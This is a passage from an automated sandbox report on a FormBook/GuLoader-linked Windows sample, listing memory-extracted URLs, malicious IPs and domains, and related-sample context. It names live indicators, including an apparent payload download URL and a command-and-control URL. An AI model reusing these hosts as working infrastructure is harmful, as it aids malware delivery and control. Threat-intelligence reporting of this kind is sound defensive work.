                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.ecosia.org/newtab/ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.greekhause.orggiLTwJlyLWpfb.exe, 00000005.00000002.19981281087.0000000000B2E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.quovadis.bm0UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.onlineipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://gemini.google.com/app?q=ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_autoipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dts.gnpge.comfirefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdfirefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.consentmanager.netipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.Inastra.onlineipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icoipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/29590/bg1.png)ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4zipconfig.exe, 00000004.00000002.19062788752.0000000004EDC000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.00000000041BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdUMOWA_PD.BAT.exe, 00000002.00000001.15100533752.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/sk-logabpstatus.php?a=SW1RdDVpeXN5Y0RTL3pGdHVTRDlkWG5JV05MNzRrTHJVYU1uM2xSipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/28903/search.png)ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ocsp.quovadisoffshore.com0UMOWA_PD.BAT.exe, 00000002.00000003.15298807290.0000000003A9E000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299059569.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15196048449.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15195457057.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/display.cfmipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://delivery.consentmanager.netipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico-11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/px.js?ch=2ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/px.js?ch=1ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdffirefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/POL.binNyUMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://bestpack.ee/POL.binV~UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/js/min.js?v2.3ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdUMOWA_PD.BAT.exe, 00000002.00000001.15100533752.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                103.21.221.4
                                                                		tempatmudisini01.clickunknown
                                                                		9905LINKNET-ID-APLinknetASNIDtrue
                                                                137.175.33.56
                                                                		dxzz.topUnited States
                                                                		54600PEGTECHINCUStrue
                                                                13.248.169.48
                                                                		www.invicta.worldUnited States
                                                                		16509AMAZON-02UStrue
                                                                185.86.211.137
                                                                		bestpack.eeSpain
                                                                		50129TVHORADADAESfalse
                                                                133.130.35.90
                                                                		komart.shopJapan7506INTERQGMOInternetIncJPtrue
                                                                54.67.87.110
                                                                		www.ngmr.xyzUnited States
                                                                		16509AMAZON-02UStrue
                                                                208.91.197.27
                                                                		www.inastra.onlineVirgin Islands (BRITISH)
                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                84.32.84.32
                                                                		dfmagazine.shopLithuania
                                                                		33922NTT-LT-ASLTtrue
                                                                194.58.112.174
                                                                		www.albero-dveri.onlineRussian Federation
                                                                		197695AS-REGRUtrue
                                                                38.47.207.146
                                                                		typ67.topUnited States
                                                                		174COGENT-174UStrue
                                                                162.213.249.216
                                                                		www.dorikis.onlineUnited States
                                                                		22612NAMECHEAP-NETUStrue
                                                                3.33.130.190
                                                                		whats-in-the-box.orgUnited States
                                                                		8987AMAZONEXPANSIONGBtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1517964
                                                                Start date and time:2024-09-25 09:51:49 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 18m 4s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected Instruction Hammering
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:UMOWA_PD.BAT.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/10@17/12
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 73%
                                                                • Number of executed functions: 78
                                                                • Number of non-executed functions: 289
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: UMOWA_PD.BAT.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                03:55:19API Interceptor29200159x Sleep call for process: ipconfig.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                103.21.221.4RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/abla/
                                                                Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/phdl/
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/lybf/
                                                                SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/r9rj/
                                                                SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                • www.tempatmudisini01.click/abla/
                                                                137.175.33.56DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                • www.dxeg.lol/rkgs/
                                                                13.248.169.48RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                                • www.smilechat.shop/ih4n/
                                                                inquiry and prices EO-230807.exeGet hashmaliciousFormBookBrowse
                                                                • www.luxe.guru/s9un/
                                                                HBLAWBP.LISTCOC & INV.exeGet hashmaliciousFormBookBrowse
                                                                • www.luxe.guru/s9un/
                                                                Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                                                                • www.smilechat.shop/ih4n/
                                                                Quotes updates request.exeGet hashmaliciousFormBookBrowse
                                                                • www.smilechat.shop/ih4n/
                                                                Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                • www.dyme.tech/h7lb/
                                                                LOL and profile.exeGet hashmaliciousFormBookBrowse
                                                                • www.smilechat.shop/ih4n/
                                                                ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                                                • www.smilechat.shop/ih4n/
                                                                PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                • www.study-in-nyc.online/f1gw/
                                                                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                • www.sleephygienist.org/9ned/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.inastra.onlineAmended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                • 208.91.197.27
                                                                PO098765678.exeGet hashmaliciousFormBookBrowse
                                                                • 208.91.197.27
                                                                www.albero-dveri.onlineAWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                • 194.58.112.174
                                                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 194.58.112.174
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 194.58.112.174
                                                                September Order.exeGet hashmaliciousFormBookBrowse
                                                                • 194.58.112.174
                                                                dxzz.topDCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                • 137.175.33.56

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                LINKNET-ID-APLinknetASNIDRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                                • 139.37.141.74
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                • 103.21.221.4
                                                                ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 139.8.6.3
                                                                firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                • 139.40.24.232
                                                                firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                • 139.255.236.171
                                                                botx.arm.elfGet hashmaliciousMiraiBrowse
                                                                • 139.16.204.145
                                                                AMAZON-02UShttps://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                • 18.244.18.32
                                                                RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                                • 108.128.197.171
                                                                https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyUGet hashmaliciousHTMLPhisherBrowse
                                                                • 3.161.82.28
                                                                http://pub-578040898e97448fab462cfa3f671292.r2.dev/gytdindex.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 3.70.101.28
                                                                http://pub-28b78cc368104fdfb2ea280368fa70b5.r2.dev/ihil.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 18.192.231.252
                                                                http://juno-online7373h.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                                • 54.171.122.26
                                                                http://walletmtamsck.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                                • 18.245.46.55
                                                                http://metamawsksextension.gitbook.io/usa/Get hashmaliciousHTMLPhisherBrowse
                                                                • 18.245.46.55
                                                                http://dalesisson.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                                                • 54.246.144.89
                                                                http://gaminiloginsignin.gitbook.io/us/Get hashmaliciousUnknownBrowse
                                                                • 18.245.46.10
                                                                PEGTECHINCUShttps://tk815.shop/Get hashmaliciousUnknownBrowse
                                                                • 107.148.46.163
                                                                DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                • 137.175.33.56
                                                                r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                • 192.74.233.8
                                                                Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                                • 107.148.62.45
                                                                PO00211240906.exeGet hashmaliciousFormBookBrowse
                                                                • 107.148.62.45
                                                                https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                                                • 137.175.7.38
                                                                http://www.hrodzdesign.comGet hashmaliciousUnknownBrowse
                                                                • 137.175.44.130
                                                                http://www.hrodzdesign.comGet hashmaliciousUnknownBrowse
                                                                • 137.175.44.130
                                                                1gocJUcAj2.exeGet hashmaliciousUnknownBrowse
                                                                • 192.74.234.120
                                                                1gocJUcAj2.exeGet hashmaliciousUnknownBrowse
                                                                • 192.74.234.120

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37f463bf4616ecd445d4a1937da06e19CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                                • 185.86.211.137
                                                                xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 185.86.211.137
                                                                GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                • 185.86.211.137
                                                                List of Items Ref_02839273882.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 185.86.211.137
                                                                Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                • 185.86.211.137
                                                                B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                • 185.86.211.137
                                                                HSBC_Payment.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                • 185.86.211.137
                                                                Payment_Advise.exeGet hashmaliciousGuLoaderBrowse
                                                                • 185.86.211.137
                                                                SOLICITUD DE OFERTA_CR894#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 185.86.211.137
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 185.86.211.137

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dllPayment_Advice.1.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Payment_Advice..exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                                                                      Payment_Advice.1.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                        Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                                                                          Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                                                                            Overdoers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              Pedido_52038923_CotizacionS_max2024.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                Overdoers.exeGet hashmaliciousGuLoaderBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\-11EqE

                                                                                  Download File
